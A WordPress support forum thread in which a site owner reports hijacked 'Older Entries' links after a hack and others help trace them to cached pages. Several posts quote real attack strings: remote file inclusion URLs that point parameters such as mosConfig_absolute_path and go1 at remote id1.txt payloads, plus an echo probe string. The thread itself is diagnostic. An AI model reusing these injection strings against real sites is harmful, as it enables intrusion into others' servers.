WordPress.org

Ready to get started?Download WordPress

Forums

wp 2.9.1 sophisticated hack (8 posts)

  1. navigadget
    Member
    Posted 5 years ago #

    I'm using the latest version of WP and my site is hacked. I can not figure out how they got in. Details:

    • older, newer page links at the bottom of the page are hijacked (see image url)
    • doesn't show hijacked links once I login as admin
    • after i login as admin then logout, never shows up hijacked link
    • looked at timestamps via ftp as much as I could; nothing
    • installed exploit scanner; nothing
    • grepped for base64 and eval text in my database file and all other files; nothing
    • see it here: http://imgur.com/2zqDb.jpg

    Please help. I do not know for how long this has been going on...

  2. ClaytonJames
    Member
    Posted 5 years ago #

    This is what I get on rollover on the very same link on your site.

    //www.yoursite.com/?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS&mosConfig_absolute_path=http%3A%2F%2Fqqe.ru%2Fforum%2FSmileys%2Fid1.txt%3F%3F

    //qqe.ru/forum/Smileys/id1.txt

    Search this string in Google for info: echo("Shiro"."Hige") -or- this "id1.txt"

    This may also be a relevant information.

    Anything telling in your access logs?

  3. navigadget
    Member
    Posted 5 years ago #

    What should I look for in access logs? I'm not very good this. I see he is using some "go1" to pass the URL in my access logs:

    [23/Jan/2010:01:30:38 -0600] "GET /?go1=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 403 54923 "-" "Mozilla/5.0"

    And there's some php code there. I searched all my files for "go1" but nothing came up. I searched for go1 using exploit scanner; one hit was something like this:

    Blocker Filesystem pattern scan Found string go1 [ABSPATH]/wp-content/cache/wp-cache-7ef8f7e1c52df0895d36dd2b3ef0ed41.html:267
    Context

    href="http://www.mysite.com/index.php/page/2?go1=http%3A%2F%2Fpivot-e-solutions.com%2Fincludes%2Fdomit%2Fid1.txt" ><span class='older'>Older Entries</span> </div>

  4. ClaytonJames
    Member
    Posted 5 years ago #

    It may be worth seeking advice or information from your host first. Perhaps they have dealt with the issue before and can offer some guidance.
    I'm guessing you might be on a shared server, so they may have, or want information relative to your issue. Other than that, there are tons of links and "how to" on cleaning up a hacked site.

    FAQ My site was hacked

  5. themaclady
    Member
    Posted 5 years ago #

    I"m still having a problem with hidden users. After upgrading to 2.9.1 I'm not sure I've cleaned out the user in the DB.

    I upgraded and the user showed up in the Users panel... deleted.

    Deleted DB and made new one and re-uploaded the saved DB file.

    Site is working again but not sure I got rid of the ID, although something in My PHP Admin told me to delete user_id2 which I did....

    Not sure what I clicked on to bring that up but posts now do not have spam words in the Google alert. Can't see the purpose of this hack -- the link still goes to the blog, the words don't show up anyplace...???

  6. navigadget
    Member
    Posted 5 years ago #

    I've realized the hijacked links were the cached ones and that's probably why they wouldn't show up once I logged in.

    I do not have any reason to believe wp-super-cache plugin was the problem but once got rid of that plugin completely my links look normal (maybe clayton can check again :)

    I hate how I still do not know what files/database entries are/were causing this.

  7. texxs
    Member
    Posted 4 years ago #

    ahh http://redtideflorida.org/pages in case you were wondering . . .

  8. texxs
    Member
    Posted 4 years ago #

    crap sorry wrong discusion I was at a very similiar discussion at:
    http://wordpress.org/support/topic/357635?replies=9#post-1431225

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.